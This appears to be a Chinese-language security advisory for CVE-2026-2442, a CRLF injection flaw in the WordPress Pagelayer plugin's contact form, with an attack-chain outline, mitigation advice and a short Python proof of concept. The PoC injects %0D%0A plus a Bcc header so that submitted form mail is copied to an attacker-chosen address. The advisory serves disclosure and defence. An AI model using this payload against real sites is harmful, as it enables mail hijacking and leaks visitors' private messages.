CVE-2026-2442 CVSS 5.3 中危

CVE-2026-2442: WordPress Pagelayer插件CRLF注入漏洞

披露日期: 2026-03-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2442

漏洞类型

CRLF注入

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Page Builder: Pagelayer (WordPress Plugin)

漏洞概述

WordPress Pagelayer插件在所有版本至2.0.7中存在CRLF注入漏洞。该漏洞允许未经身份验证的攻击者通过联系表单注入恶意的电子邮件头部（如Bcc/Cc）。这是因为表单处理程序在执行占位符替换时，未移除攻击者控制字段中的CR/LF字符，导致攻击者可滥用邮件发送功能。

技术细节

该漏洞源于Pagelayer插件联系表单处理程序对用户输入的不当处理。在处理表单提交时，插件会对攻击者控制的字段执行占位符替换，并将结果直接传递给电子邮件头部生成函数，而未移除其中的回车符（CR，\r）和换行符（LF，\n）。根据SMTP协议规范，CRLF序列用于分隔邮件头部字段。攻击者可以通过在输入参数中注入%0D%0A，提前终止当前的头部字段并插入任意恶意头部（例如Bcc: [email protected]）。如果目标网站的联系表单配置为在邮件模板头部使用占位符，未经身份验证的远程攻击者即可利用此漏洞劫持邮件发送服务，将表单内容转发给攻击者指定的邮箱，导致用户隐私泄露或服务器被用于垃圾邮件转发。

攻击链分析

STEP 1

侦察

攻击者识别出目标WordPress站点使用了Pagelayer插件，且版本低于或等于2.0.7。

STEP 2

识别利用点

攻击者找到站点上的联系表单，并确认该表单在邮件模板头部配置中使用了占位符（例如{email}）。

STEP 3

构造Payload

攻击者构造包含CRLF字符（%0D%0A）的恶意字符串，旨在注入额外的邮件头（如Bcc）。

STEP 4

发送请求

攻击者向表单处理端点发送POST请求，将带有CRLF注入的Payload填充到对应的表单字段中。

STEP 5

执行攻击

服务器处理请求，未能过滤CRLF字符，将恶意内容写入邮件头部，导致邮件被发送给攻击者指定的第三方邮箱。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests target = "http://example.com/wp-admin/admin-ajax.php" # Payload injecting CRLF sequences to add a Bcc header # %0D is CR, %0A is LF injection_payload = "[email protected]%0D%0ABcc: [email protected]" data = { "action": "pagelayer_contact_form", "form_data": { "name": "Test User", "email": injection_payload, "message": "This is a test." } } response = requests.post(target, data=data) print(f"Response Status: {response.status_code}") # If successful, an email is sent to [email protected]

影响范围

Page Builder: Pagelayer <= 2.0.7

防御指南

临时缓解措施

建议立即更新Pagelayer插件到最新版。若无法立即更新，应临时禁用插件中的联系表单功能，或在WAF（Web应用防火墙）中设置规则，拦截包含%0D%0A或\r\n序列的请求参数，以防止CRLF注入攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表